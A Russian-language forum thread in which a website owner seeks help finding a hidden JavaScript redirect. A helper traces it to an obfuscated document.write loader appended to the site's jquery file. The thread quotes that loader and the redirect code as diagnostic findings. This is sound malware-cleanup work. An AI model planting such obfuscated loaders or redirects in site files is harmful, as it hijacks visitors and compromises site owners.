Как найти вирусный редирект?

[iddqden]

Всем привет!

Уже месяц наверное не могу найти причину нежелательного редиректа на сайте ([email protected]).
Если раньше редиректило в основном с французским ip (пожаловались посетители из Франции), то сейчас и из других стран.
Заражение системы компов исключено - проверял и на различных чистейших виртуалках.
Проверял как антивирусом на хостинге, так и всеми возможными онлайн-сервисами. Скачал бэкап, проверил и антивирусами и антималварями - нифига нет.

Где искать заразу?

 

 

[iddqden]

Добавлю видос в облаке, чтобы скачивание не смущало:

https://drive.google.com/file/d/1gSAPPAH05j5nL9XHvBpOthDJzbeABxeF/view?usp=sharing

[magdek]

Думаю вам сюда

 

[NotSlow]

Судя по видео, редирект точно на javascript сделан (не серверный редирект).

И есть ненулевой шанс, что скрипт этот не от вашего сайта грузится (бесполезно искать на хостинге), а со стороннего чего-то.

 

Вас редиректит стабильно или случайно как-то? Я попробовал с нескольких разных vpn и не поймал.

Нужно как минимум с открытой консолью браузера (ctrl+shift+i) открывать и смотреть что за скрипты загружаются, что происходит...

[NotSlow]

Вот оно, 100%

Скрины ниже.

На вашу страницу подгружается некая https://cdn34.com/e

И с нее приходит редирект:

if(document.referrer){window.location.href='https://adsnet.pw/?id=czI7NjQxMjM0N2JhZQ==';}

Причем если обновить страницу, то приходит пустота... Но если нажать ctrl+h и потом "забыть" все с этого домена, то снова приходит редирект... в прятки играют

 

Короче задача найти где у вас фигурирует cdn34.com и удалить. Возможно это действительно вирус, вставка эта в ни в чем неповинном другом скрипте сделана.

Надо смотреть... пишите в личку если хотите, могу поискать.

[NotSlow]

Вот этот скрипт:

https://bostanika.ge/catalog/view/javascript/jquery/jquery-2.1.1.min.js

В самом низу:

document.write("<sc"+"ri"+"pt s"+"rc"+"='ht"+"tp"+"s:/"+"/c"+"dn"+"3"+"4.c"+"om/"+"e' as"+"yn"+"c>"+"<\/"+"sc"+"ri"+"pt>");

Как оно туда попало... это уже совсем другая история. И есть ли еще где-то среди сайта что-то подобное.

[spectre]

могу решить быстрее и лучше всех с гарантией 3 месяца не за все деньги мира 

[iddqden]

13.08.2023 в 22:08, NotSlow сказал:

Вот этот скрипт:

Благодарствую за идеальную подмогу и подсказку!

В принципе, я двигался в нужном направлении, когда вчера начал изучать сведения через консоль разработчика. Но мне тупо не хватило знаний и времени добиться нужного результата. Теперь мои знания расширились)

Метод присадки редиректа явно хитрожопый. Я раньше неоднократно вылавливал различные шеллы и вставки, но тут прям засада - ни один антивирус и антималварь не видит. Теперь принцип понятен - полез конопатить ручками.

[iddqden]

13.08.2023 в 22:23, spectre сказал:

могу решить быстрее и лучше всех с гарантией 3 месяца не за все деньги мира 

Спасибо, учту. Чужими руками даже бесплатно не будет пользы в понимании и опыта. Пока сам.

Гарантия 3 мес. говорит о том, что будет найдена уязвимость, через которую пролезли?

[spectre]

13.08.2023 в 22:19, iddqden сказал:

Спасибо, учту. Чужими руками даже бесплатно не будет пользы в понимании и опыта. Пока сам.

Гарантия 3 мес. говорит о том, что будет найдена уязвимость, через которую пролезли?

 

у вас самого без навыков не получится, они приобретаются на практике 

 

гарантия работает если не ставите админ админ и модулей с варезных помоек, но зачем это вам если сами))